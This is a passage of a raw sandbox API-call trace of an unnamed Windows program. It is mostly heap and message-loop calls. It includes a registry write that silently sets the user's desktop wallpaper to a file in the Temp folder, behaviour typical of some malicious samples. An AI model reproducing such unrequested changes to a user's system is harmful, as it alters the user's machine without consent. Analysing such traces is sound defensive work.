dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0293.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0293.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0293.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0293.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0293.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0293.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0293.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0293.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0293.387] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0293.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0293.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0293.387] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0293.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0293.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0293.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0293.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0293.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0293.387] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0293.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0293.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0293.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0293.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0293.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0293.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0293.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0293.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0293.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0293.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0293.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0293.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0293.388] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0293.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0293.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0293.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0293.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0293.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0293.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0293.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0293.388] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0293.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0293.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0293.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0293.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0293.389] timeGetTime () returned 0x11896b2 [0293.389] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.389] Sleep (dwMilliseconds=0xa) [0293.563] timeGetTime () returned 0x1189760 [0293.563] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.563] Sleep (dwMilliseconds=0xa) [0293.642] timeGetTime () returned 0x11897b0 [0293.643] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.643] Sleep (dwMilliseconds=0xa) [0293.723] timeGetTime () returned 0x1189800 [0293.723] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0293.723] TranslateMessage (lpMsg=0x8cf798) returned 0 [0293.723] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0293.723] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0293.724] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0293.724] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.724] Sleep (dwMilliseconds=0xa) [0293.774] timeGetTime () returned 0x1189833 [0293.774] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.774] Sleep (dwMilliseconds=0xa) [0293.843] timeGetTime () returned 0x1189878 [0293.843] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.843] Sleep (dwMilliseconds=0xa) [0293.906] timeGetTime () returned 0x11898b7 [0293.906] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.906] Sleep (dwMilliseconds=0xa) [0293.941] timeGetTime () returned 0x11898da [0293.941] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.941] Sleep (dwMilliseconds=0xa) [0293.978] timeGetTime () returned 0x11898ff [0293.978] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.978] Sleep (dwMilliseconds=0xa) [0294.012] timeGetTime () returned 0x1189922 [0294.012] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0294.012] Sleep (dwMilliseconds=0xa) [0294.065] timeGetTime () returned 0x1189956 [0294.065] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0294.065] Sleep (dwMilliseconds=0xa) [0294.112] timeGetTime () returned 0x1189986 [0294.112] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0294.112] Sleep (dwMilliseconds=0xa) [0294.177] timeGetTime () returned 0x11899c6 [0294.177] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0294.177] Sleep (dwMilliseconds=0xa) [0294.219] timeGetTime () returned 0x11899f0 [0294.219] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0294.219] Sleep (dwMilliseconds=0xa) [0294.265] timeGetTime () returned 0x1189a1e [0294.265] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0294.265] Sleep (dwMilliseconds=0xa) [0294.299] timeGetTime () returned 0x1189a41 [0294.299] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0294.299] Sleep (dwMilliseconds=0xa) [0294.335] timeGetTime () returned 0x1189a64 [0294.335] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0294.335] Sleep (dwMilliseconds=0xa) [0294.592] timeGetTime () returned 0x1189b65 [0294.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0294.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0294.592] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0294.592] TranslateMessage (lpMsg=0x8cf968) returned 0 [0294.592] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0294.592] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0294.592] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0294.592] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0294.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0294.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0294.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0294.593] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0294.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0294.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0294.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0294.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0294.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0294.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0294.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0294.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0294.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0294.594] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0294.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0294.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0294.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0294.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0294.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0294.594] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0294.595] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0294.595] RegCloseKey (hKey=0x2d0) returned 0x0 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0294.595] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0294.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0294.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0294.595] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0294.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0294.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0294.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0294.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0294.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0294.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0294.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0294.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0294.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0294.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 